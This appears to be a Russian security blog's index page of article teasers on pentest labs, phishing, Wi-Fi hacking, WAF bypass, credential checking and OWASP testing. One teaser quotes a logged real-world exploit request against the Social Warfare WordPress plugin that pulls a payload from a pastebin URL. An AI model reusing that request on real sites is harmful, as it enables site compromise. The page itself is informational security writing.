Корпоративные лаборатории Pentestit — от тестирования на проникновение до расследования инцидентов ИБ
,

Информационная безопасность стала очень популярной штукой. И может быть вы уже слышали о лабораториях тестирования на проникновение Test lab, которые мы публикуем в открытом доступе каждый год? Лаборатории, где любой желающий может проверить и закрепить свои навыки поиска и эксплуатации уязвимостей.

Читать далее Корпоративные лаборатории Pentestit — от тестирования на проникновение до расследования инцидентов ИБ

Фишинг: социальная инженерия через почту
,

Некоторое время назад на корпоративную почту пришло письмо. Оно содержало информацию о том, что закончился срок регистрации домена и необходимо произвести оплату.
Читать далее Фишинг: социальная инженерия через почту

Легкий взлом Wi-Fi с использованием Kali Linux и wifiphisher
, , ,

Информация предназначена исключительно для ознакомления. Не нарушайте законодательство.

В любой, даже самой защищенной системе, всегда есть слабое место. Зачастую, слабым местом является сам пользователь. Прочитав статью, я решил дополнить ее, тем более, что метод социальной инженерии является наиболее распространенным и продуктивным способом получения доступа к информации или информационным системам.

Читать далее Легкий взлом Wi-Fi с использованием Kali Linux и wifiphisher

Методы обхода WAF
, ,

Информация предназначена исключительно для ознакомления. Не нарушайте законодательство.

Web Application Firewall — популярный инструмент для противодействия атакам на веб-приложения. В этой статье я продемонстрирую несколько способов обхода WAF.

Читать далее Методы обхода WAF

Как мы обнаружили RCE, пытаясь воспроизвести XSS в Social Warfare
, , ,

Статья носит информационный характер. Не нарушайте законодательство.

Некоторое время назад WAF зафиксировал атаку, которая имела следующий вид:
https://defcon.ru/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf

Из открытых источников мы узнали, что атака представляла собой попытку эксплуатации хранимой XSS уязвимости в Social Warfare — популярном WordpPress-плагине, установленном более чем на 70000 сайтов. Это показалось интересным и мы решили разобраться в уязвимости более детально.

Читать далее Как мы обнаружили RCE, пытаясь воспроизвести XSS в Social Warfare

Nemesida WAF Free
, ,

Nemesida WAF Free — бесплатная версия «Nemesida WAF», обеспечивающая базовую защиту веб-приложения сигнатурным анализом, простая в установке и обслуживании, не имеющая высоких требований к аппаратным ресурсам.

Отличительной особенностью «Nemesida WAF Free» является простота установки и обслуживании, а также собственные сигнатуры, способные более точно выявлять атаки на веб-приложения при минимальном количестве ложных срабатываний.

Бесплатная версия «Nemesida WAF» представляет собой динамический модуль для ПО «nginx», обеспечивающий базовый функционал защиты веб-приложения от атак на основе сигнатурного метода. Подробнее

Cr3dOv3r — проверяем учётные данные на популярных сервисах
, , ,

В данной статье будет рассмотрена утилита Cr3dOv3r, разработанная D4Vinchi и выложенная им на GitHub. При создании этого инструмента, D4Vinchi преследовал две основные идеи. Первая — это возможность проверить является ли ваша учетная запись скомпрометированной. Второй идеей данной утилиты является возможность проверить, подходят ли известные вам учетные данные к популярным сервисам.

Читать далее Cr3dOv3r — проверяем учётные данные на популярных сервисах

Анонсирован новый стандарт защиты беспроводных сетей: WPA3

Wi-Fi Alliance анонсировал сведения о внедрении протокола WPA3. По прогнозам первый официальный релиз будет доступен уже в этом году.
Читать далее Анонсирован новый стандарт защиты беспроводных сетей: WPA3

Перевод OWASP Testing Guide. Часть 3.9.
,

Представляю вашему вниманию очередную часть перевода OWASP Testing Guide. В данной статье речь пойдет о сохранении паролей.

Предыдущие статьи

  1. Тестирование: введение и задачи
  2. Сбор информации с помощью поисковых систем
  3. Определение веб-сервера
  4. Поиск информации в метафайлах веб-сервера
  5. Определение веб-приложений на сервере
  6. Поиск утечек информации в комментариях и метаданных
  7. Определение точек входа веб-приложения
  8. Составление карты веб-приложения
  9. Определение фреймворка веб-приложения
  10. Определение веб-приложения
  11. Составление карты архитектуры веб-приложения
  12. Тестирование конфигурации инфраструктуры веб-приложения
  13. Изучение расширений файлов
  14. Поиск страрых версий веб-приложения, скрытых файлов и резервных копий
  15. Поиск административных интерфейсов
  16. Тестирование HTTP методов
  17. Тестирование HSTS
  18. Тестирование кросс-доменной политики
  19. Изучение ролей пользователей
  20. Тестирование процесса регистрации
  21. Предоставление учетных записей
  22. Определение имен пользователей
  23. Обход аутентификации

Читать далее Перевод OWASP Testing Guide. Часть 3.9.

Перевод OWASP Testing Guide. Часть 3.8.
,

Представляю вашему вниманию очередную часть перевода OWASP Testing Guide. В данной статье речь пойдет об обходе аутентификации.

 

Предыдущие статьи
  1. Тестирование: введение и задачи
  2. Сбор информации с помощью поисковых систем
  3. Определение веб-сервера
  4. Поиск информации в метафайлах веб-сервера
  5. Определение веб-приложений на сервере
  6. Поиск утечек информации в комментариях и метаданных
  7. Определение точек входа веб-приложения
  8. Составление карты веб-приложения
  9. Определение фреймворка веб-приложения
  10. Определение веб-приложения
  11. Составление карты архитектуры веб-приложения
  12. Тестирование конфигурации инфраструктуры веб-приложения
  13. Изучение расширений файлов
  14. Поиск страрых версий веб-приложения, скрытых файлов и резервных копий
  15. Поиск административных интерфейсов
  16. Тестирование HTTP методов
  17. Тестирование HSTS
  18. Тестирование кросс-доменной политики
  19. Изучение ролей пользователей
  20. Тестирование процесса регистрации
  21. Предоставление учетных записей
  22. Определение имен пользователей
  23. Определение правил генерации имен пользователей
  24. Изучение передачи пользовательских данных
  25. Тестирование учетных данных по умолчанию
  26. Изучение механизма блокировки учетных записей

 

Читать далее Перевод OWASP Testing Guide. Часть 3.8.